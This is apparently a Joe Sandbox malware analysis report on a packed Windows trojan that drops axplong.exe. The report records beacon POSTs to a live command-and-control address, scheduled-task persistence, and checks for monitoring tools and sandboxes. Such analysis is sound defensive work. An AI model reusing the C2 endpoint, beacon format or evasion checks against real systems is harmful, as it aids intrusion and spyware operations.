                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_008FBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_008FBD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#Y
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)c~v&
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.y
                    Source: axplong.exe, 00000006.00000002.3389125760.000000000137A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6c
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6y)t
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7b
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpDb
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpGc
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpJy%t
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpTc
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUb
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpbb
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedMG
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpec
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpfyYt
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiRyMt
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded.G
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phprc
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzyUt

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_008F4CF06_2_008F4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_008FE4406_2_008FE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_009330686_2_00933068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00927D836_2_00927D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_008F4AF06_2_008F4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0093765B6_2_0093765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00932BD06_2_00932BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00936F096_2_00936F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_009387206_2_00938720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0093777B6_2_0093777B
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 4BC8AB389044AABD25719E924300530FEDDAE8EFA8A485CBFD67DE8F347132F2
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974561478201635
                    Source: file.exeStatic PE information: Section: dmbsosmk ZLIB complexity 0.99479069756624
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9974561478201635
                    Source: axplong.exe.0.drStatic PE information: Section: dmbsosmk ZLIB complexity 0.99479069756624
                    Source: axplong.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 55%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1923072 > 1048576
                    Source: file.exeStatic PE information: Raw size of dmbsosmk is bigger than: 0x100000 < 0x1a3e00

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.cf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1df580 should be: 0x1d9842
                    Source: file.exeStatic PE information: real checksum: 0x1df580 should be: 0x1d9842
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: dmbsosmk
                    Source: file.exeStatic PE information: section name: uuntaxqq
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: dmbsosmk
                    Source: axplong.exe.0.drStatic PE information: section name: uuntaxqq
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0090D84C push ecx; ret 6_2_0090D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.986034970037844
                    Source: file.exeStatic PE information: section name: dmbsosmk entropy: 7.954774902073578
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.986034970037844
                    Source: axplong.exe.0.drStatic PE information: section name: dmbsosmk entropy: 7.954774902073578
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
